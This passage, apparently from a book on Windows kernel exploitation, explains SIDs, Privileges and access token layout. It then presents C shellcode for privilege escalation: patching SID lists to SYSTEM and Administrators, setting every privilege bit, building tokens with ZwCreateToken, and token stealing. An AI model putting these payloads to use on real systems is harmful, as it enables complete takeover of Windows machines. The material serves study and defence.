Along with User, Group, and Computer SIDs, there are a few special SIDs that are used to contextualize the user logon session, or to restrict user access to a set of resources. A few of them are important to know about in order to fully understand the troubles we may face when playing with the access token within our shellcode.

  • Restricted SID

    A SID can be flagged as restricted. A restricted SID is placed in a separate SID list called the restricted SID list. When the Access Check algorithm detects the presence of a SID on the restricted SID list within the access token, it performs a double-check; the first check is done using the default SID list, and the second one is done using the restricted SID list. To be able to access the resource, both checks must be passed successfully. Usually a restricted SID is used to temporarily drop the privileges of a running process.

  • Deny-Only SID

    SIDs in the access token can be flagged as deny-only SIDs. A deny-only SID will only be evaluated during an access check, when it gets compared against Access-Denied ACE structures. Since Access-Denied ACEs override Access-Grant ACEs, this type of SID can also be used to restrict access to resources. The use of deny-only SIDs is most prevalent when implementing the Filtered Admin Token.

  • Logon SID

    The Logon SID is created by the Winlogon process when a new session is created (i.e., after a successful login attempt), and is unique to the system. This SID is used to protect access to the desktop and to the Interactive Windows Station. When using Terminal Desktop, for example, every user gets a different session and a different desktop. Usually the system grants access to the current desktop to the Logon SID. In this way, every process owning this SID within its access token is able to successfully access it.

  • Integrity Level SID

    Beginning with the Vista release, Windows introduced the concept of Mandatory Integrity Levels. This mechanism is implemented using a particular type of SID, known as an integrity level SID. There are five types of integrity level SIDs, ranging from the lowest-possible privilege level, Untrusted Level (level 0), to the highest-possible privilege level, System Level (level 4), with a few levels in between. Following is a list of integrity level SIDs:

    S-1-16-0x0 Untrusted/Anonymous

    S-1-16-0x1000 Low

    S-1-16-0x2000 Medium

    S-1-16-0x3000 High

    S-1-16-0x4000 System

    Every object has an integrity level associated with its SID, and every process inherits the integrity level of its parent unless the SID of the executable child has an explicitly stated lower integrity level, in which case the new process will inherit the lower integrity level. When the default Mandatory Policy (No-Write-Up) is used, a process with a lower integrity level cannot write into a resource requiring a higher integrity level. When escalating privileges, we have to carefully check that the newly crafted (or stolen) token's access is not restricted due to a low integrity level.

    Tip

    To be able to perform all of the necessary steps of a successful exploitation, we need to make sure we properly check the integrity level of the process we will be using to deliver our payload. To further explain this mechanism, let's assume that we have already successfully managed to remotely exploit an instance of Internet Explorer running in Protected Mode, and that we wish to escalate privileges by way of a local kernel race condition. To successfully exploit this vulnerability, we will need to write a few bytes into a file to create a special file mapping. Where can we create this file? When Internet Explorer is running in Protected Mode, the process has a low integrity level (SID: S-1-16-4096), and the only writable directory we will have access to will be the %USERPROFILE%AppDataLocalLow directory (or any other directory that grants write access to a low integrity level process).

  • Service SID

    With the release of Vista, Windows introduced the concept of the service SID. A service SID is a special SID that uses the existing Windows access control system to provide fine-grained access control on a service-by-service basis. With a service SID, you can apply an explicit ACL to a resource that the service will then be able to access exclusively. The service SID can also be used to restrict or prevent access to a service by making the service SID a deny-only SID. In doing this, we can prevent a service running as a user with a high privilege level from being able to access a given resource. We need to make sure we deal properly with the service SID when playing with the access token so as to avoid any unwanted limitations.

Privileges

As mentioned in the introduction, a few very powerful privilege levels exist. Since the word “privilege” can generally be used to describe a generic right, we decided to use the word Privilege (with a capital “P”) throughout this chapter whenever we are dealing with one of the access token privileges. To better understand the magnitude of such Privilege levels, we can take as an example two of the most known and abused Privileges: SeDebugPrivilege and SeLoadDriverPrivilege. A process with the SeDebugPrivilege Privilege level is able to attach to almost every process in the system. Being able to debug a process is equivalent to being able to modify its address space, thereby being able to gain total control of any privileged process. Similarly, the SeLoadDriverPrivilege, as the name suggests, grants every process owning it the ability to load an arbitrary device driver; again, being able to insert arbitrary code into the kernel means, in short, “game over.”

Warning

On x64 Windows kernels, Kernel Mode Code Signing (KMCS) is fully enforced, and therefore it is no longer possible to load unsigned drivers. This check is mainly used for code integrity purposes, but it is frequently—and incorrectly—also presented as a security feature. Despite the fact that KMCS does, indeed, prevent the insertion of unsigned code, there is nothing preventing an attacker from loading a signed yet known-vulnerable driver and exploiting it, thereby violating the kernel integrity.

Depending on the release level, Windows keeps track of the process's Privileges within the access token in different ways. In Windows versions up to Windows Server 2003 SP2, the currently active process's privileges are stored in a dynamically allocated LUID_AND_ATTRIBUTES structures array. The following snippet shows the structure:

typedef struct _LUID_AND_ATTRIBUTES {

LUID Luid;

DWORD Attributes;

} LUID_AND_ATTRIBUTES, *PLUID_AND_ATTRIBUTES;

This array is directly referenced by the access token, and holds only existing Privileges; these Privileges are owned by a process but can be either enabled or disabled. A Privilege can be enabled or disabled multiple times, but it can be dropped just one time. When a Privilege is dropped, the kernel definitively removes it from the array list; after the Privilege is removed, the process is no longer able to use the dropped Privilege. The kernel assigns a number, stored in the Luid field, to any Privilege. The Attributes field is used as a flag variable, and can take any of the following three values: Disabled (0x00), Enabled (0x1), or Default Enabled (0x3). The number of active Privileges stored in the array is also held by the access token (see the “Access Token” section of this chapter for details).

From Windows Vista and later (i.e., NT 6.x kernels), the Privilege list is stored in bitmap form inside an SEP_TOKEN_PRIVILEGES structure, as shown in the following snippet:

typedef struct _SEP_TOKEN_PRIVILEGES

{

UINT64 Present;

UINT64 Enabled;

UINT64 EnabledByDefault;

} SEP_TOKEN_PRIVILEGES, *PSEP_TOKEN_PRIVILEGES;

Each field (Present, Enabled, and EnabledByDefault), being of type UINT64, has the potential to hold up to 64 distinct Privileges, each identified by way of an index within the bitmap; the Present field holds the active Privileges bitmap, while the other fields (Enabled and EnabledByDefault) keep track of the status of the Privileges, much as the Attributes field does in older Windows implementations. Again, as with pre-Vista Windows implementations, the structure used to keep track of Privileges is referenced by the process's access token.

Access Token

Every running thread and process has a corresponding security context—a set of information that describes the rights and privileges assigned to a security principal. The Windows kernel keeps track of the security context using a special object: the access token (or just token).

The access token is an opaque object that includes any information the kernel needs in order to grant or deny access to a resource, track process/thread resources, and manage the audit policy; it also contains various other process-, thread-, and system-related information. In short, by controlling the token, one controls the security principals behind it. Stealing a token from a given process implies associating all of the rights and Privileges of the stolen process with the attacker's process. Similarly, the ability to arbitrarily modify the current process's token permits the attacker to raise the local privileges to the maximum level.

The first step in getting to this point is to find the current token—or, more generally, to find the token associated with a given process. For simplicity's sake, let's look at how we can spot the token structure address with the help of the kernel debugger.

Our first step involves locating the EPROCESS address of the process we wish to monitor. Every process has an associated EPROCESS structure—an opaque structure that the kernel uses to keep track of all process attributes, such as the Object Table, the Process Locks state, the user-mode Process Control Block (PCB) address, and, obviously, the access token.

In the following example, we use the WinDbg !process extension command to find the token address within the EPROCESS structure:

1: kd> !process 0 0

[…]

PROCESS fffffa8002395b30

SessionId: 1 Cid: 071c Peb: 7fffffdf000

ParentCid: 06a4

DirBase: 21cfd000

ObjectTable: fffff8a00104a8c0

HandleCount: 505.

Image: explorer.exe

[…]

1: kd> !process fffffa8002395b30 1

PROCESS fffffa8002395b30

SessionId: 1 Cid: 071c Peb: 7fffffdf000 ParentCid: 06a4

DirBase: 21cfd000 ObjectTable: fffff8a00104a8c0

HandleCount: 505.

Image: explorer.exe

VadRoot fffffa8002394ed0 Vads 281 Clone 0 Private 2417.

Modified 5. Locked 0.

DeviceMap fffff8a0009c74e0

Token fffff8a00106eac0

ElapsedTime 04:46:18.785

UserTime 00:00:00.234

KernelTime 00:00:00.640

[…]

The offset where the token pointer is stored within the EPROCESS structure varies among Windows releases. If we only need to modify the token, we can simply use the exported kernel API PsReferencePrimaryToken(); PsReferencePrimaryToken() returns a pointer to the token structure associated with the EPROCESS pointer that was passed to it as a parameter. If, however, we also need to know the exact offset of this pointer within the EPROCESS structure (e.g., during token stealing), we can simply walk over the EPROCESS structure and compare the address in the EPROCESS structure with the one returned by the PsReferencePrimaryToken() API.

Now that we have discovered the token address by way of the EPROCESS structure, it is time to take a deeper look at the token structure itself. We can then use the token address together with the dt (display type) WinDbg command to print both the token structure and its content. What follows is the Windows Server 2008 R2 64-bit token structure:

1: kd> dt nt!_token fffff8a00106eac0

+0x000 TokenSource : _TOKEN_SOURCE

+0x010 TokenId : _LUID

+0x018 AuthenticationId : _LUID

+0x020 ParentTokenId : _LUID

+0x028 ExpirationTime : _LARGE_INTEGER 0x7fffffffffffffff

+0x030 TokenLock : 0xfffffa8002380940 _ERESOURCE

+0x038 ModifiedId : _LUID

+0x040 Privileges : _SEP_TOKEN_PRIVILEGES

+0x058 AuditPolicy : _SEP_AUDIT_POLICY

+0x074 SessionId : 1

+0x078 UserAndGroupCount : 0xc

+0x07c RestrictedSidCount : 0

+0x080 VariableLength : 0x238

+0x084 DynamicCharged : 0x400

+0x088 DynamicAvailable : 0

+0x08c DefaultOwnerIndex : 0

+0x090 UserAndGroups : 0xfffff8a00106edc8 _SID_AND_ATTRIBUTES

+0x098 RestrictedSids : (null)

+0x0a0 PrimaryGroup : 0xfffff8a0010066a0

+0x0a8 DynamicPart : 0xfffff8a0010066a0 -> 0x501

+0x0b0 DefaultDacl : 0xfffff8a0010066bc _ACL

+0x0b8 TokenType : 1 ( TokenPrimary )

+0x0bc ImpersonationLevel : 0 ( SecurityAnonymous )

+0x0c0 TokenFlags : 0x2a00

+0x0c4 TokenInUse : 0x1 ''

+0x0c8 IntegrityLevelIndex : 0xb

+0x0cc MandatoryPolicy : 3

+0x0d0 LogonSession : 0xfffff8a000bcf230

+0x0d8 OriginatingLogonSession : _LUID

+0x0e0 SidHash : _SID_AND_ATTRIBUTES_HASH

+0x1f0 RestrictedSidHash : _SID_AND_ATTRIBUTES_HASH

+0x300 pSecurityAttributes : 0xfffff8a000d36640

+0x308 VariablePart : 0xfffff8a00106ee88

As one might expect, the token holds the SID_AND_ATTRIBUTES array reference, which is stored at offset 0x90. The number of SID_AND_ATTRIBUTES entries in the UserAndGroups array is stored in the UserAndGroupCount variable at offset 0x78. Similar to the UserAndGroup/UserAndGroupCount fields, there are also corresponding fields to keep track of restricted SIDs—namely, RestrictedSids and its counterpart, RestrictedSidCount. As no restricted SIDs are associated with this process, the RestrictedSids field holds a NULL pointer and the RestrictedSidCount is 0. The other important piece of information we are seeking from within the token structure is the previously mentioned Privileges list. Since the preceding snippet refers to an NT 6.x kernel, the Privileges are stored in the SEP_TOKEN_PRIVILEGES bitmap placed at offset 0x40.

Warning

Older NT 5.x kernel releases implement the Privileges list as a dynamic array of LUID_AND_ATTRIBUTES structures; this dynamic array is named Privileges, and is placed at offset 0x74. As opposed to SEP_TOKEN_PRIVILEGES, which is embedded within the token access itself, the Privileges field is just a pointer to the LUID_AND_ATTRIBUTE structures array.

Although we have found what we were originally searching for in this structure, the observant reader may have also noticed that there are a couple of additional unexpected entries—the SidHash and RestrictedSidHash fields. Both of these fields were introduced with the NT 6.x kernel, and they hold, respectively, the hashes of the UserAndGroup and RestrictedSids SID arrays. The access check algorithm checks these hashes every time the corresponding list of SIDs is used, in order to ensure that the SID list cannot be modified. The main consequence of this is that when dealing with NT 6.x kernels, we can no longer directly modify the SID lists (or we cannot do so without updating the corresponding hashes, at least). There are three main alternatives to bypass this barricade to our success:

  1. Apply the hash algorithm after modifying the SID lists.

  2. Avoid SID list patching and act only on the Privileges bitmap, continuing the exploitation in user land.

  3. Directly swap the offending token with a different token owned by a higher-privileged process (token stealing).

For brevity's sake, we will not cover the hashing implementation method in this book, but will instead concentrate our efforts on learning how to implement the remaining two workarounds.

Building the Shellcode

In this section, we will introduce three different pieces of shellcode (which have been written as C routines) that we can use within local kernel exploits to increase the privileges of the currently running process.

The first piece of shellcode, useful only on NT 5.x kernels, makes use of the SID list patching approach (the sample function was written to target a Windows Server 2003 SP2 32-bit system). The second piece of shellcode makes use of the Privileges patching approach, and can be triggered on all kernel releases (the sample function used in this chapter was written to exploit a Windows Server 2008 R2 64-bit system). The third and final sample piece of shellcode makes use of the token stealing approach. You can find the source code for all three of the aforementioned functions in the Trigger32.c and Trigger64.c files, as we discussed at the beginning of this chapter. In the coming sections, we will discuss the advantages and the drawbacks of each approach.

SID List Patching

The simplest way to begin our explanation of the SID list patching vector is by reviewing a code snippet. The routine that will be implementing this vector is called ShellcodeSIDListPatch(), the relevant code of which is as follows:

typedef struct _SID_BUILTIN

{

UCHAR Revision;

UCHAR SubAuthorityCount;

SID_IDENTIFIER_AUTHORITY IdentifierAuthority;

ULONG SubAuthority[2];

} SID_BUILTIN, *PSID_BUILTIN;

SID_BUILTIN SidLocalAdminGroup = {1, 2, {0,0,0,0,0,5},{32,544}};

SID_BUILTIN SidSystem = {1, 1, {0,0,0,0,0,5},{18,0}};

PISID FindSID(PSID_AND_ATTRIBUTES firstSid,

UINT32 count,

ULONG rid)

{

UINT32 i;

ULONG lRid;

PSID_AND_ATTRIBUTES pSidList = firstSid;

for(i=0; i<count; i++, pSidList++)

{

PISID pSid = pSidList->Sid;

lRid = pSid->SubAuthority[pSid->SubAuthorityCount-1];

if(lRid == rid)

return pSid;

}

return NULL;

}

VOID DisableDenyOnlySID(PSID_AND_ATTRIBUTES firstSid,

UINT32 count)

{

UINT32 i;

PSID_AND_ATTRIBUTES pSidList = firstSid;

for(i=0; i<count; i++, pSidList++)

pSidList->Attributes &= ~SE_GROUP_USE_FOR_DENY_ONLY;

}

VOID ShellcodeSIDListPatch()

{

PACCESS_TOKEN tok;

PEPROCESS p;

UINT32 sidCount;

PSID_AND_ATTRIBUTES sidList;

PISID localUserSid,userSid;

p = PsGetCurrentProcess(); [1]

tok = PsReferencePrimaryToken(p); [2]

sidCount = GetOffsetUint32(tok,

TargetsTable[LocalVersion].Values[LocalVersionBits] [3]

.SidListCountOffset);

sidList = GetOffsetPtr(tok,

TargetsTable[LocalVersion].Values[LocalVersionBits] [4]

.SidListOffset);

userSid=sidList->Sid;

LocalCopyMemory(userSid, [5]

&SidSystem,

sizeof(SidSystem));

DisableDenyOnlySID(sidList, sidCount); [6]

RemoveRestrictedSidList(tok); [7]

localUserSid = FindUserGroupSID(sidList, [8]

sidCount,

DOMAIN_ALIAS_RID_USERS);

if(localUserSid)

LocalCopyMemory(localUserSid, [9]

&SidLocalAdminGroup,

sizeof(SidLocalAdminGroup));

PsDereferencePrimaryToken(tok); [10]

return;

}

The preceding code does the following:

  • Finds the correct EPROCESS structure

  • Finds the access token associated with the EPROCESS structure

  • Finds the active SID list in the access token

  • Removes, if present, all deny-only flags on all active SIDs and clears the restricted SID list and counter if present

  • Replaces the current User Owner SID with the built-in NT AUTHORITYSYSTEM SID

  • Replaces the local BUILTINUsers Group SID with the local BUILTINAdministrators SID

Let's discuss each of these steps in more detail.

Locate EPROCESS Structure

The first step is to find the target process's EPROCESS structure. It is possible to discover the EPROCESS structure associated with the current running process by looking at the current Kernel Processor Control Block (KPRCB), an undocumented internal kernel structure used by the Kernel Executive for a variety of purposes. The KPRCB holds a reference to the current ETHREAD (Executive Thread Block) structure, which in turns holds a reference to the current EPROCESS structure. The KPRCB is located within the Kernel Processor Control Region (KPCR), an area that can be accessed easily by way of a special segment selector; on 32-bit kernels, the KPCR can be accessed via the FS segment, whereas on 64-bit kernels it is accessed via the GS segment.

As you can see, traversing the kernel structure requires a good knowledge of the structure's layout; this is complicated by the fact that these layouts can change from one kernel version to the next—and even, for that matter, from one service pack to the next. Whenever possible, it is preferable to make use of external kernel APIs to avoid bothering with (likely eventually useless) hardcoded offsets. In this case, we can use the external API PsGetCurrentProcess() [1]. The following tiny piece of assembly code, taken from the PsGetCurrentProcess() API on Windows Server 2003 SP2 32-bit, accomplishes exactly what we described earlier. It takes the ETHREAD structure from the KCBP (FS:124h) and subsequently gets the EPROCESS structure stored at offset 38h within the ETHREAD structure. In so doing, it can thus return exactly what we need—namely, the EPROCESS structure associated with the current running process.

.text:0041C4FA _PsGetCurrentProcess@0 proc near

.text:0041C4FA mov eax, large fs:124h

.text:0041C500 mov eax, [eax+38h]

.text:0041C503 retn

We can now easily retrieve the EPROCESS structure of the current running process, but what if we want or need the EPROCESS structure of an entirely different process? It just so happens that there is an interesting exported API to do that, as well; its name is PsLookUpProcessByProcessId(), and its prototype is as follows:

NTSTATUS PsLookupProcessByProcessId(

IN HANDLE,

OUT PEPROCESS *

);

The PsLookUpProcessByProcessId() function takes two arguments. The first argument is the process ID (PID), and the second is a pointer-to-pointer that will hold the EPROCESS structure address when the function successfully returns; if the process is not found, the process returns with STATUS_INVALID_PARAMETER.

Locate the Access Token

The second step consists of getting the access token related to the EPROCESS structure. Again, we could dig into kernel structures and their relative offsets, or we could take a simpler and more reasonable approach and rely on an exported API; in this case, we will make use of PsReferencePrimaryToken() [2], which has the following function prototype:

PACCESS_TOKEN

PsReferencePrimaryToken(IN PEPROCESS);

This function takes as a unique argument the related EPROCESS structure, returns the access token address, and increments its reference counter.

Note

When the access token in question isn't referred to by multiple processes (e.g., while access token stealing), our routine needs to be mindful to call the corresponding release API, PsDereferencePrimaryToken(), after having raised our target process's Privileges.

Patch the Access Token

Patching the access token involves five steps that target the active SID list. This series of steps:

  • Finds the access token associated with the current EPROCESS structure

  • Finds the active SID list in the access token

  • Removes, if present, all deny-only flags on all active SIDs

  • Removes, if present, the restricted SID list

  • Replaces the User Owner SID with the built-in NT AUTHORITYSYSTEM account SID

First, we have to look at two important access token fields, UserAndGroupCount and UserAndGroup, which describe the SIDs in the active list. Since the contents of these fields reside at different offsets, the code at [3] and [4] makes use of a prebuilt offset table to retrieve their respective contents. This offset table is indexed using a runtime index corresponding to the currently running version of Windows.

The UserAndGroup pointer addresses a dynamically allocated array of SID_AND_ATTRIBUTES structures. Each structure is composed of only two fields: Sid, which is a pointer to the SID structure holding SID information; and Attributes, which is flags storage to hold SID attributes. The first structure in the array is the Owner SID, which usually holds the current Local/Domain User SID. At [5], the function substitutes this User SID with the local NT AUTHORITYSYSTEM SID (S-1-5-18) stored in the SidSystem variable. Later, at [6] and [7], the function invokes DisableDenyOnlySID() and RemoveRestrictedSidList(). DisableDenyOnlySID() removes all of the deny-only SIDs, stripping away the SE_GROUP_USE_FOR_DENY_ONLY flag, whereas RemoveRestrictedSidList() removes, if present, the restricted list, nullifying the list pointer and overwriting the counter with a zero value.

Fix Token Group

In addition to fixing the current user SID, it is also worthwhile to fix the Users group, which is done via the FindUserGroupSid() function. FindUserGroupSid() (at [8]) locates the local BUILTINUsers Group SID. Next, at [9], the function overwrites the BUILTINUsers Group SID with the BUILTINAdministrator group stored in the global SidLocalAdminGroup variable. Finally, at [10], the local access token is released using the corresponding API PsDereferencePrimaryToken() (decrementing its internal reference counter). Notwithstanding domain Group Policy settings, since the process now possesses Local System and Local Administrator associated rights, it is henceforth capable of accessing virtually all local resources, adding new local administrator users, modifying Local Security Policy, and so forth.

Privileges Patching

As we've seen already, NT 6.x kernels introduced the concept of active and restricted SID list checksums. By making use of the Privileges patching approach, we can avoid patching the SID list and, in turn, the checksum recovery procedure. The Privileges patching routine is split into two parts:

  • Kernel-mode elevation

    The kernel-mode portion of this attack is simpler than that used by the SID patching approach. On NT 6.x kernels, it simply overwrites the Privileges bitmap within the access token, adding a few super Privileges. The routine implementing the kernel-mode elevation payload is named ShellcodePrivilegesAdd(), and it exists within the Trigger64.c source file.

  • User-mode elevation

    The user-mode portion of the attack is far more elaborate than the kernel portion, and involves making use of an undocumented system call: ZwCreateToken(). This code creates a new token and associates it with a new spawned process. In this manner, we can create from scratch a totally new token with an arbitrary SID list. After the kernel payload has been executed, the current (or target) process possesses every possible privilege (including, of course, the subset of super Privileges), and it is able to access virtually any object (using the SeTakeOwnershipPrivilege), debug any process (using SeDebugPrivileges), or even load a custom device driver (using SeLoadDriverPrivilege).

As one can see, there are many vectors we can now use to increase our influence on the local system. We chose to present the arbitrary token creation approach for the following reasons:

  • It does not involve loading device drivers (no kernel tainting; avoids driver signing).

  • It does not involve system service code injection (we work only on our process).

  • It does not steal the ownership of objects (that is, we do not make use of SeChangeOwnershipPrivilege multiple times to change the ownership of objects, which would trigger suspicious system events).

  • We can indirectly control all access control mechanisms (or, at the very least, those related to the SID list, Privileges list, and even integrity levels).

Kernel-Mode Payload

As usual, let's begin by taking a look at some code:

typedef struct _SEP_TOKEN_PRIVILEGES

{

UINT64 Present;

UINT64 Enabled;

UINT64 EnabledByDefault;

} SEP_TOKEN_PRIVILEGES, *PSEP_TOKEN_PRIVILEGES;

VOID ShellcodePrivilegesAdd()

{

PACCESS_TOKEN tok;

PEPROCESS p;

PSEP_TOKEN_PRIVILEGES pTokPrivs;

p = PsGetCurrentProcess(); [1]

tok = PsReferencePrimaryToken(p); [2]

pTokPrivs = GETOFFSET(tok, [3]

TargetsTable[LocalVersion].Values[LocalVersionBits]

.PrivListOffset);

pTokPrivs->Present = pTokPrivs->Enabled = [4]

pTokPrivs->EnabledByDefault =

0xFFFFFFFFFFFFFFFFULL;

PsDereferencePrimaryToken(tok);

return;

}

Steps [1] and [2] obtain the access token in the same way the ShellcodeSIDListPatch() does. They get the EPROCESS structure using the PsGetCurrentProcess() kernel API, and then reference the access token using the PsReferencePrimaryToken() kernel API. At [3], the code locates the SP_TOKEN_PRIVILEGES structure within the access token. Different from SID lists, this structure on NT 6.x kernels is embedded in the access token; the GETOFFSET() macro simply adds the correct offset to the access token structure pointer to locate the beginning of the SEP_TOKEN_PRIVILEGES structure field. The code at [4] is straightforward. It overwrites all of the bitmasks within SEP_TOKEN_PRIVILEGES, adding all possible privileges to the current access token. The kernel does not perform any checksums on the Privileges bitmasks. Despite the fact that it would've been sufficient to patch only the Present field, the function also patches the Enable field. Enabling them while performing the kernel payload step saves us from having to enable them later, during the user-mode elevation step.

User-Mode Elevation

The user-mode elevation routine comprises two functions: CreateTokenFromCaller() and SpawnChildWithToken(). CreateTokenFromCaller() is used to create a new access token with arbitrary rights and privileges using the undocumented ZwCreateToken() API. SpawnChildWithToken() is a simple wrapper to the CreateProcessAsUser() API, which is used to spawn a new process holding a different access token. The most important snippets from the CreateTokenFromCaller() function, for the sake of this discussion, follow. You can find the fully commented code in the Trigger64.c source file.

BOOL CreateTokenFromCaller(PHANDLE hToken)

{

[ … ]

if(!LoadZwFunctions(&ZwCreateTokenPtr)) [1]

return FALSE;

__try

{

ret = OpenProcessToken(GetCurrentProcess(), [2]

TOKEN_QUERY | TOKEN_QUERY_SOURCE,

&hTokenCaller);

if(!ret)

__leave;

[ … ]

lpStatsToken = GetInfoFromToken(hTokenCaller, TokenStatistics);

lpGroupToken = GetInfoFromToken(hTokenCaller, TokenGroups); [3]

lpPrivToken = GetInfoFromToken(hTokenCaller, TokenPrivileges); [4]

pSid=lpGroupToken->Groups;

pSidSingle = FindSIDGroupUser(pSid, lpGroupToken->GroupCount, [5]

DOMAIN_ALIAS_RID_USERS);

if(pSidSingle)

memcpy(pSidSingle, [6]

&SidLocalAdminGroup,

sizeof(SidLocalAdminGroup));

for(i=0; i<lpGroupToken->GroupCount; i++,pSid++) [7]

{

if(pSid->Attributes & SE_GROUP_INTEGRITY)

memcpy(pSid->Sid,

&IntegritySIDSystem,

sizeof(IntegritySIDSystem));

pSid->Attributes &= ~SE_GROUP_USE_FOR_DENY_ONLY;

}

lpOwnerToken = LocalAlloc(LPTR, sizeof(PSID));

lpOwnerToken->Owner = GetLocalSystemSID();

lpPrimGroupToken = GetInfoFromToken(hTokenCaller, TokenPrimaryGroup);

lpDaclToken = (hTokenCaller, TokenDefaultDacl);

pluidAuth = &authid;

li.LowPart = 0xFFFFFFFF;

li.HighPart = 0xFFFFFFFF;

pli = &li;

sessionId = GetSessionId(hTokenCaller); [8]

ntStatus = ZwCreateTokenPtr(hToken, [9]

TOKEN_ALL_ACCESS,

&oa,

TokenPrimary,

pluidAuth,

pli,

&userToken,

lpGroupToken,

lpPrivToken,

lpOwnerToken,

lpPrimGroupToken,

lpDaclToken,

&sourceToken);

if(ntStatus == STATUS_SUCCESS)

{

ret = SetSessionId(sessionId, *hToken); [10]

sessionId = GetSessionId(*hToken);

ret = TRUE;

}

[ … ]

To summarize, this function gets the current process's access token, extracts the SID list and Privileges list, manipulates the SID list, and uses the modified version of the current token to create a brand-new access token.

At [1], the code invokes LoadZwFunctions(), which stores into the ZwCreateTokenPtr function pointer the address of the ZwCreateToken() API. Since the function is not intended to be directly imported by third-party code, LoadZwFunctions() invokes the GetProcAddress() API, passing the ntdll.dll module handle to get the address of the ZwCreateToken() function using runtime dynamic linking in much the same way that we extracted NtQuerySystemInformation() when listing the kernel module's name and base address.

At [2], the function opens the current process's access token object and stores its descriptor in the hTokenCaller handle. As we saw before, almost everything under Windows is an object and an object handle can be opened to it.

At [3] and [4], the function extracts the current SID list and Privileges list from the current token and copies them into user-space memory.

At [5], the function invokes the FindSIDGroupUser() custom function, which is the same function used in the SID list patching technique presented before. It finds the BUILTINUsers Group SID and returns its actual address in memory. This time the function is not called during the kernel shellcode to manipulate the kernel structure, but it is used to access the user-land buffer where the kernel structure is copied. The function works well in this context since the structure layout we are interested in has been preserved during the user-land copy.

Next, at [6], the function substitutes the BUILTINAdministrators group SID in place of the BUILTINUsers Group SID located just before.

The loop at [7] scans the SID list once again, in search of an integrity level SID. As seen in the SID description, the integrity level is implemented as a special type of SID. After finding this SID, the code overwrites it with the system integrity SID (which is a powerful integrity level if we do not consider the protected process integrity SID used by DRM protected services). The code in the loop also clears any deny-only SID-related flags.

At [8], the function obtains the current Session ID. This step requires further explanation. The concept of a Session was introduced with the advent of Terminal Services, which were created to allow different users to share a single Windows system via multiple graphics terminals. Since Windows was not originally designed to be a multiuser environment, it assigned global names to many system objects and resources. With the advent of Sessions, the Object Manager is able to virtually separate global objects’ namespaces (such as the Windows Station, desktops, etc.) allowing operating system services to each access their Session-private resources as though they were global. The Session ID uniquely identifies a given existing session within the system. Every time a user interactively logs on to the machine, Windows creates a new Session, associates it with a Window Station, and then associates the desktops to the Window Station.

To further complicate this mechanism, Windows NT 6.x kernels introduced the Session 0 Isolation concept. On older (NT 5.x) systems, the first user to interactively log on to the system shares the same session (Session 0) with system processes and services. On Windows NT 6.x systems, however, Session 0 (the first session) is noninteractive, and is available only to system processes and services (isolation). When the first interactive user logs on, he will be associated to Session 1; the second will be associated to Session 2, and so on. Session 0 Isolation separates privileged services from interactive console user access, thus putting an end to all Shatter-like attacks.2

But why is our Session number so important to us? The answer lies in the way that the token is built. When a new access token (at [9]) is created, the kernel sets Session 0 as the default session. Let's suppose that we are running the exploit from the local console (when dealing with NT 6.x systems), or by way of a remote Terminal Services session. If we'll be running the new process using the modified-privilege access token, the child process will run by default on Session 0, which wouldn't give us the opportunity to interact with the process through the current Windows Station/desktop.

To avoid this problem, we can set the access token session to the current one, via the SetSessionSID() function at [10]. This function internally invokes the SetTokenInformation() API, passing the Session ID obtained previously, at [8]. SetSessionSID() requires the invoking process to own the SeTcbPrivilege, but in the current case this isn't a problem, as we've already gained possession of every Privilege on the system, thanks to the execution of our kernel payload. We may now safely run the child program using the SpawnChildWithToken() function, an excerpt from which follows:

BOOL SpawnChildWithToken(HANDLE hToken, PTCHAR command)

{

[ … ]

pSucc = CreateProcessAsUser(hToken,

NULL,

(LPTSTR)szLocalCmdLine,

&sa, &sa,

FALSE,

0,

NULL,

NULL,

&si, &pi);

[ … ]

The only meaningful function that this wrapper calls is the CreateProcess- AsUser() API. By default, every newly created process inherits the access token of its respective parents. With this API, however, we can specify which access token to use; as one may expect, we will pass the access token created by the ZwCreateToken() function. If this function executes successfully we will be in possession of a process having the highest possible privilege. Figure 6.5 shows the access token before spawning the child process (and hence before changing the SIDs) but after the kernel payload has been executed (all Privileges enabled).

Image

Figure 6.5 Process after kernel payload execution.

Token Stealing

The token-stealing technique, a well-known method that many published kernel exploits already use3 and that is discussed in several whitepapers,4 involves the exchange of the target process's access token with the access token of another process. To be more specific, the access token of a more privileged process is copied over the target process's access token. Since the access token is not a simple structure, usually the code just replaces the access token reference within the EPROCESS structure.

This approach has both advantages and drawbacks. Let's start with the advantages. First, we only need to manage the EPROCESS structure. Second, we can avoid having to hardcode any offsets, since we know the access token pointer is located within the EPROCESS structure and we have a well-known API, PsReferencePrimaryToken(), which can tell us the access token's address. The only thing we need to do is scan the EPROCESS structure, trying to locate the same address returned by the API. When the addresses are the same, we have found the correct offset and we can then overwrite it with the more privileged access token.

We have to consider just a few more things: how big the EPROCESS structure is, and in what manner the access token address is stored within the EPROCESS structure.

The EPROCESS structure size may vary among Windows releases, but we can ignore this issue for two reasons. First, the structure is always allocated in a nonpages pool that is always mapped using 4MB-wide Large Pages (2MB wide when PAE is enabled on a 32-bit kernel). The odds of finding the EPROCESS structure allocated near the end-of-page boundary are so small that we can ignore this possibility. Moreover, the access token reference pointer is always stored in the first half of the structure and we can always safely use the smallest size.

The second reason we can ignore this issue has to do with the way the access token reference is stored within the EPROCESS structure. The following code snippet shows the access token reference encountered on a Windows Server 2003 SP2 32-bit system. As usual, the WinDbg dt command is used.

0: kd> dt nt!_EPROCESS

+0x000 Pcb : _KPROCESS

+0x078 ProcessLock : _EX_PUSH_LOCK

[ … ]

+0x0d4 ObjectTable : _HANDLE_TABLE

+0x0d8 Token : _EX_FAST_REF

[ … ]

The Token field is of type EX_FAST_REF. This is its structure:

typedef struct _EX_FAST_REF{

union

{

PVOID Object;

ULONG RefCnt: 3;

ULONG Value;

};

} EX_FAST_REF, *PEX_FAST_REF;

The EX_FAST_REF structure holds a union. Every element shares the same space; notably, the RefCnt (short for reference counter) occupies the final three least-significant bits of the storage space. The access token structure is always allocated using an 8-byte boundary alignment, with the last three bits always being zero. This means the last three bits of the Object pointer, where the access token's address is stored, are used as a reference counter; the contents of these three bits within the memory address are therefore not meaningful to us. To compute the correct address we will need to zero the last three bits while scanning the EPROCESS structure to find the correct offset of the access token. We can do this easily using a logical AND with a value of ~7.

